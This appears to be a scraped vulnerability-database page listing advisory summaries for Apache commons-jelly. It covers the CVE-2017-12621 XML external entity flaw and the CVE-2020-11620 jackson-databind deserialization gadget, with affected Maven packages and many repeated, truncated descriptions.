EUVD-2020-0384

Malware in sbrugna...

com.canoo:webtest (>=586 <=1393), com.flexiblewebsolutions.xdriveunit:xdriveunit (=0.3) +79 more potentially affected by CVE-2017-12621 via commons-jelly:commons-jelly (>=1.0 <=1.0-beta-4)

commons-jelly:commons-jelly MAVEN version =1.0, =586, =0.1, =1.0, =20050708.205531, =1.2, =1.0-M5, =1.0.1, =1.3, =1.9 - jepi:jepi =1.0 - marmalade:marmalade-compat-jelly =1.0-alpha-3 - maven-plugins:maven-sourceforge-plugin =1.3 and more Source cves: CVE-2017-12621 Source advisory:...

Improper Restriction of XML External Entity Reference in Jelly

During Jelly xml file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity XXE...

CVE-2017-12621

An XML External Entity XXE Injection vulnerability was found in Commons Jelly library. If a custom doctype entity is declared with a SYSTEM entity with a URL and that entity is used in the body of the Jelly file, the parser will attempt to connect to provided URL...

jackson-databind: Serialization gadgets in commons-jelly:commons-jelly

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

jackson-databind: Serialization gadgets in commons-jelly:commons-jelly

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

Important: Red Hat Security Advisory: rh-maven35-jackson-databind security update

An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for eac...

jackson-databind mishandles the interaction between serialization gadgets and typing

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded aka commons-jelly...

Deserialization Of Untrusted Object

FasterXML jackson-databind is vulnerable to deserialization of untrusted data. It causes polymorphic typing because there are more than one association gadget types related to commons-jelly org.apache.commons.jelly.impl.Embedded by default. A remote attacker can gain unauthorized access to...

CVE-2020-11620

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded aka commons-jelly...

CVE-2020-11620

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded aka commons-jelly...

UBUNTU-CVE-2020-11620

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded aka commons-jelly...

CVE-2020-11620

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded aka commons-jelly...

PT-2020-4067 · Fasterxml +3 · Jackson-Databind +3

Name of the Vulnerable Software and Affected Versions: FasterXML jackson-databind versions 2.x before 2.9.10.4 Description: The issue is related to the deserialization mechanism in the FasterXML jackson-databind library, specifically with the commons-jelly component. This can allow a remote...

Apache Commons Jelly Security Bypass Vulnerability

Apache Commons Jelly is the United States Apache Apache Software Foundation of a Java and XML-based scripting engine . A security vulnerability exists in Apache Commons Jelly version 1.0. An attacker can exploit this vulnerability to bypass security restrictions and perform unauthorized operation...

XML External Entity (XXE)

Apache commons-jelly is vulnerable to XML external entity XXE. When jelly XML files are parsed with a custom doctype declared as a SYSTEM entity with a URL at the beginning of the file, the parser will connect to the URL at instantiation...

CVE-2017-12621

During Jelly xml file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity XXE...

CVE-2017-12621

During Jelly xml file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity XXE...

Apache Commons Jelly connects to url with certain custom doctype definitions.

Severity: Medium Vendor: The Apache Software Foundation Versions Affected: commons-jelly-1.0 core, namely commons-jelly-1.0.jar Description: During jelly xml file parsing with xerces, if a custom doctype entity is declared with a ?SYSTEM? entity with a url and that entity is used in the body of t...

CVE-2017-12621

During Jelly xml file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity XXE...